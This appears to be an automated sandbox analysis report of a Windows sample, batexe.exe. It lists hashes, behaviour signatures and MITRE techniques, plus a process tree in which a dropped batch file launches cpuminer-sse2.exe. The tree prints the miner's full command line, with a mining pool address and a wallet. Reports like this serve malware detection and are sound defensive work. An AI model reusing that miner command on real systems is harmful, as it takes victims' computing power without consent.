73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
294s
max time network
297s
platform
windows10-2004_x64
resource
win10v2004-20231222-ja
resource tags

arch:x64arch:x86image:win10v2004-20231222-jalocale:ja-jpos:windows10-2004-x64systemwindows
submitted
14/02/2024, 16:26

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation	batexe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation	b2e.exe

Executes dropped EXE 2 IoCs

pid	Process
5932	b2e.exe
520	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
520	cpuminer-sse2.exe
520	cpuminer-sse2.exe
520	cpuminer-sse2.exe
520	cpuminer-sse2.exe
520	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/3148-9-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 3148 wrote to memory of 5932	3148	batexe.exe	84
PID 3148 wrote to memory of 5932	3148	batexe.exe	84
PID 3148 wrote to memory of 5932	3148	batexe.exe	84
PID 5932 wrote to memory of 5624	5932	b2e.exe	85
PID 5932 wrote to memory of 5624	5932	b2e.exe	85
PID 5932 wrote to memory of 5624	5932	b2e.exe	85
PID 5624 wrote to memory of 520	5624	cmd.exe	88
PID 5624 wrote to memory of 520	5624	cmd.exe	88

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3148
- C:\Users\Admin\AppData\Local\Temp\9858.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\9858.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\9858.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:5932
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\9B17.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5624
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:520

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\9858.tmp\b2e.exe

Filesize
8.4MB

MD5
ce0f35d94c982653818d2200b9c6136f

SHA1
c6b711de257bf5f6e6e71c6107f124ab472cd316

SHA256
387d2c69ce716beb2a7bacf4fc7b190d670061e77a781bd03cc22a331b209462

SHA512
a58a9fc1b8d770dcd812657fab257292d544a733ffda05322f6ccb55ae64988c8168b67d565c7f843c8b6e9387f7f25caec6535567bd1993a238927ca5e9b91e

Download Submit
C:\Users\Admin\AppData\Local\Temp\9858.tmp\b2e.exe

Filesize
3.7MB

MD5
9aee72ab77a157f977325e6a378f7098

SHA1
fd22abe08400dd8f8f3121f021566f5b4cef9aa5

SHA256
58451eb20763eb1c8f084105f39a3505ec1c8990e791ddd10b3201babb98fa3b

SHA512
3bfc7af8ce243ca4691a34509359491d59d44a43584844c4613bd70f18bf2d70ab1e1674fe56bda77975a2471c262cd58991b503ec6c26378acc6b19e81f8ce6

Download Submit
C:\Users\Admin\AppData\Local\Temp\9858.tmp\b2e.exe

Filesize
3.9MB

MD5
b62b9c56821cb1c32436936ae0df3e09

SHA1
edaf00f46520b4a7402a0fa6fdea50d97999a5cb

SHA256
25c60a0b521853a8f075ca1b5c883c5c72cfada5d2e3f19b46e2ae48470846d9

SHA512
7f8d21668a42ed39a666b6b78cfdefc0f2bc7075688163b8b649a9ebb66ce78cc015d9965bbcb4f3796d0e30bb2a604c3300b44f5448454411f756b900bf6c33

Download Submit
C:\Users\Admin\AppData\Local\Temp\9B17.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
578KB

MD5
ed0f06572806f1d3fcc7a2460cefab7b

SHA1
db1ff9dbe9ea00ba55b019a5b2510b9af76c98dc

SHA256
7f44f27cc729181471ee9d52216b834c8fcaff8e63b320e86108ec35063b13b7

SHA512
a621272cc65999f0d8647c99b1299e32dfa855f6985ba86fbd1b2bd0d974e9c3458a3a8022cdca9b6460a195c3627f83fbb79a605097fb79dd00b4feb28d4ff2

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
669KB

MD5
ea182af44efadc8f99c3a05ae4fbbe27

SHA1
636ec53f4dcc8fb137be878ffdc65ddb3458a591

SHA256
a948545a6287f4923b4a9019138f4ae593c07c7989425e06418aa5264d94ee74

SHA512
767375d4de2eaec74700c5e20d74e3229a45ed6ccbd826aef1e608b9e358a67603664a35c34056c4fc1813b507c464066c37ec912996e19ced6159b700ba53a7

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
400KB

MD5
b0cfa972e89cec0762da4345d6a6a87b

SHA1
df575e73c01aa699c7d712a65760d101e98d77fb

SHA256
6cd3b45b81acd61f67671f6cbce1f5f1594ff6663c57664e551cac86af646ba1

SHA512
2c15f59cfeadf87869d3ab6689616839e9cbbd363ece8f6b6ad779140822e4f5322a8d3df4a9ffc8d3bcd8f83e1fa62d2dbc4ab77035aa1766c9077db17baba4

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
537KB

MD5
26c045a4eaf0f1aeba93e5466ad0f575

SHA1
9b8a52ca9f5ee8b0cf228b8eec9a72f54795021a

SHA256
026ee631a16237dde5213806a05dd05fa673bbb81a546a2b0ef7b6ac9a436c1b

SHA512
7500a8cc8b4142754b5146ba461c93e59aa0ca6f93e60a0248278b7b879756b3c43b34b07435d6f1f415f8078226f37438804786f1392d655b423c92b3cf754b

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
545KB

MD5
e06e97272230bb5245679fa71a693ea0

SHA1
146fd42986a265bebe0f2d9774cc5feeeae0938d

SHA256
720d96264d01bb6be7be27f65416d88d3a0bb3a4efd2340ebe902bde513bcb74

SHA512
ba9ebe5cb8b88b9a8ae560c1a53c67c4521f2b720174c87dc0bb0c012bddac5be43f749e86ecbb8d8e5b37c581fea1a42eaf45e09f0034746dbfc4eb5e6cf79c

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
734KB

MD5
acecb6dceafd555d89552c3c37c9ec40

SHA1
18907febbad655912a6bf1346d7c4c252a37903f

SHA256
aff7db9fb33e84e9a31b327a3dd321f7e20a8aa03678ed074db3864e08708832

SHA512
39e8c7183b2163ed63ff61572e42742214bc33b668c1faeca5c0f22de3cc50c67fe58a5dc0558452ad8f1512304380d3cc54539aeaecedc4cb816a534f52fc60

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
404KB

MD5
d853e4e230559e53179a07b83375556a

SHA1
2fb439684d1a4f2f2578b95b763aa35b9cb11572

SHA256
1f66604602fe971ed73f69e256190b59ccec52011f832c95732628264574e787

SHA512
0943c3d97976a6d6fbf5784f192880c492f4d7e52caeef59d61c4e19eb4b0f31411d2e1da5a62eeef950782b61b87196eec0f862ef19f7427d4b92ca3441454c

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
388KB

MD5
4e8f732c868154cf47fb3d460bc69c10

SHA1
19867505bd70f03f77995bd5d98e0ebbbbb16e7e

SHA256
b351fa0f2b942e3158f4aa4c7920c10384c3d5e23156b2c719e06b4f0a4a9e28

SHA512
827b7f697635c2062e0f43b18a6ebfd76c34801137c1c792ca66027b3ae6439b0a028d91afb2f1d426f3b7099f8bd9c43be5f8eb207ee62223f928dbfbd7f0f5

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
471KB

MD5
e3f847679293667c6d5f545d6450d94c

SHA1
37382af248a744f727ce9b52de8dd502a3706833

SHA256
29cd2fa1a81a6b3f3740398245fcc3ca4adef53880e6933954326f32f36eb30c

SHA512
e83f7f75ea444d934d99e035b792fdcf20a4a3dda6e1636fc6217bb9e5a6f9fe46adbc3cf89f58f95559fbc21a8c3741116cda2eccb02b8b4b42a6194d58e4d7

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
509KB

MD5
b0a5c8de7559d0f3b9bb32e97e6b65f3

SHA1
e547376cb69834fb82fb672883fdbb89c4852da2

SHA256
241e777db1bf158315239dbc44a15a8ce3330604939cdd7b1fb1a5fecfb6ede4

SHA512
2539fe6dec2046b978ba67a75437991f658f4b015dcc121d456368b2ce0a34ba73e38aa7d5e5b6f94b0278ea75799454f1fba4bce83a61e9b15374637f2b6edc

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
592KB

MD5
d5cdab4941938ff3b8ea02f7e30aa5e5

SHA1
083bec8fc980dc134afc46e558b08e021d65162e

SHA256
f8b666fb63d4f3d535526d1420764ad971e2c8d20d2eca2335e66961f68b6257

SHA512
c53d05137d0a1c1e2971926a30bc4dacc2d5dc47bb1b9a70dd605eef890ab1b4184c551416c2745a82fee704c171d6e84f30af7dbf0eb7405f7d50958ac28b3c

Download Submit
memory/520-45-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/520-79-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/520-43-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/520-44-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/520-46-0x00000000569B0000-0x0000000056A48000-memory.dmp

Filesize
608KB

Download
memory/520-104-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/520-47-0x0000000000E60000-0x0000000002715000-memory.dmp

Filesize
24.7MB

Download
memory/520-48-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/520-99-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/520-59-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/520-64-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/520-69-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/520-74-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/520-89-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/3148-9-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/5932-8-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/5932-53-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download